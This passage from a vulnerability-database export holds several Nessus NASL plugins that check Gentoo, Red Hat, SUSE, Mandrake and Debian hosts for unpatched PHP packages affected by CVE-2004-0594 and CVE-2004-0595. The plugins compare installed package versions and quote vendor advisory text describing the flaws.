'>=dev-php/php-4.3.8'\n # emerge -pv '>=dev-php/mod_php-4.3.8'\n # emerge '>=dev-php/mod_php-4.3.8'\n # emerge -pv '>=dev-php/php-cgi-4.3.8'\n # emerge '>=dev-php/php-cgi-4.3.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/php-cgi\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\nif (qpkg_check(package:\"dev-php/php\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\nif (qpkg_check(package:\"dev-php/mod_php\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:52:33", "bulletinFamily": "scanner", "description": "Updated php packages that fix various security issues are now\navailable.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting\nis enabled in versions of PHP 4 before 4.3.8. If a remote attacker\ncould force the PHP interpreter to allocate more memory than the\nmemory_limit setting before script execution begins, then the attacker\nmay be able to supply the contents of a PHP hash table remotely. This\nhash table could then be used to execute arbitrary code as the\n", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2004-395.NASL", "href": "https://www.tenable.com/plugins/nessus/13652", "published": "2004-07-19T00:00:00", "title": "RHEL 2.1 : php (RHSA-2004:395)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:395. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13652);\n script_version (\"1.31\");\n script_cvs_date(\"Date: 2019/10/25 13:36:10\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"RHSA\", value:\"2004:395\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2004:395)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix various security issues are now\navailable.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting\nis enabled in versions of PHP 4 before 4.3.8. If a remote attacker\ncould force the PHP interpreter to allocate more memory than the\nmemory_limit setting before script execution begins, then the attacker\nmay be able to supply the contents of a PHP hash table remotely. This\nhash table could then be used to execute arbitrary code as the\n'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0594 to this issue.\n\nThis issue may be exploitable if using the default PHP configuration\nwith the 'register_globals' setting of 'On'. The Apache memory\nexhaustion bug, fixed in a previous update to Red Hat Enterprise Linux\n3, may also allow this PHP issue to be exploited; this Apache bug does\nnot affect Red Hat Enterprise Linux 2.1.\n\nStefan Esser discovered a flaw in the strip_tags function in versions\nof PHP before 4.3.8. The strip_tags function is commonly used by PHP\nscripts to prevent Cross-Site-Scripting attacks by removing HTML tags\nfrom user-supplied form data. By embedding NUL bytes into form data,\nHTML tags can in some cases be passed intact through the strip_tags\nfunction, which may allow a Cross-Site-Scripting attack. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0595 to this issue.\n\nAll users of PHP are advised to upgrade to these updated packages,\nwhich contain backported patches that address these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0594\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:395\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:395\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.1.8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:21:44", "bulletinFamily": "scanner", "description": "The remote host is missing the patch for the advisory SUSE-SA:2004:021 (php4/mod_php4).\n\n\nPHP is a well known, widely-used scripting language often used within\nweb server setups.\nStefan Esser found a problem with the ", "modified": "2019-12-02T00:00:00", "id": "SUSE_SA_2004_021.NASL", "href": "https://www.tenable.com/plugins/nessus/13837", "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2004:021: php4/mod_php4", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:021\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13837);\n script_version (\"1.15\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n \n name[\"english\"] = \"SUSE-SA:2004:021: php4/mod_php4\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2004:021 (php4/mod_php4).\n\n\nPHP is a well known, widely-used scripting language often used within\nweb server setups.\nStefan Esser found a problem with the 'memory_limit' handling of PHP which\nallows remote attackers to execute arbitrary code as the user running\nthe PHP interpreter. This problem has been fixed. Additionally a\nproblem within the 'strip_tags' function has been found and fixed which\nallowed remote attackers to inject arbitrary tags into certain web\nbrowsers, issuing XSS related attacks.\nSince there is no easy workaround except disabling PHP, we recommend\nan update for users running the PHP interpreter within the apache\nweb server.\n\nTo be sure the update takes effect you have to restart the apache process\nby executing the following command as root:\n\n/usr/sbin/rcapache restart\n\nor if you use the apache2 package\n\n/usr/sbin/rcapache2 restart\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_21_php4.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:27\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the php4/mod_php4 package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"mod_php4-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.3.1-169\", release:\"SUSE8.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.1-169\", release:\"SUSE8.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-servlet-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-imap-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mysql-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-session-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-wddx-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"php4-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE9.0\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE9.1\") )\n{\n set_kb_item(name:\"CVE-2004-0594\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0595\", value:TRUE);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:05:25", "bulletinFamily": "scanner", "description": "Stefan Esser discovered a remotely exploitable vulnerability in PHP\nwhere a remote attacker could trigger a memory_limit request\ntermination in places where an interruption is unsafe. This could be\nused to execute arbitrary code.\n\nAs well, Stefan Esser also found a vulnerability in the handling of\nallowed tags within PHP", "modified": "2019-12-02T00:00:00", "id": "MANDRAKE_MDKSA-2004-068.NASL", "href": "https://www.tenable.com/plugins/nessus/14167", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2004:068)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:068. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14167);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:47\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"MDKSA\", value:\"2004:068\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2004:068)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered a remotely exploitable vulnerability in PHP\nwhere a remote attacker could trigger a memory_limit request\ntermination in places where an interruption is unsafe. This could be\nused to execute arbitrary code.\n\nAs well, Stefan Esser also found a vulnerability in the handling of\nallowed tags within PHP's strip_tags() function. This could lead to a\nnumber of XSS issues on sites that rely on strip_tags(); however, this\nonly seems to affect the Internet Explorer and Safari browsers.\n\nThe updated packages have been patched to correct the problem and all\nusers are encouraged to upgrade immediately.\"\n );\n # http://security.e-matters.de/advisories/112004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83c215d0\"\n );\n # http://security.e-matters.de/advisories/122004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d4bce03\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common430\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php430-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php432-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64php_common432-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libphp_common432-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php-cgi-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php-cli-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php432-devel-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libphp_common430-430-11.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php-cgi-4.3.1-11.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php-cli-4.3.1-11.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php430-devel-430-11.2.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64php_common432-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libphp_common432-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php-cgi-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php-cli-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php432-devel-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:01:07", "bulletinFamily": "scanner", "description": "Two vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CAN-2004-0594\n The memory_limit functionality allows remote attackers\n to execute arbitrary code under certain circumstances.\n\n - CAN-2004-0595\n\n The strip_tags function does not filter null (\\0)\n characters within tag names when restricting input to\n allowed tags, which allows dangerous tags to be\n processed by some web browsers which could lead to\n cross-site scripting (XSS) vulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-669.NASL", "href": "https://www.tenable.com/plugins/nessus/16343", "published": "2005-02-10T00:00:00", "title": "Debian DSA-669-1 : php3 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-669. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16343);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:18\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"DSA\", value:\"669\");\n\n script_name(english:\"Debian DSA-669-1 : php3 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CAN-2004-0594\n The memory_limit functionality allows remote attackers\n to execute arbitrary code under certain circumstances.\n\n - CAN-2004-0595\n\n The strip_tags function does not filter null (\\0)\n characters within tag names when restricting input to\n allowed tags, which allows dangerous tags to be\n processed by some web browsers which could lead to\n cross-site scripting (XSS) vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-669\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php3 packages.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.0.18-23.1woody2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"php3\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-gd\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-imap\", 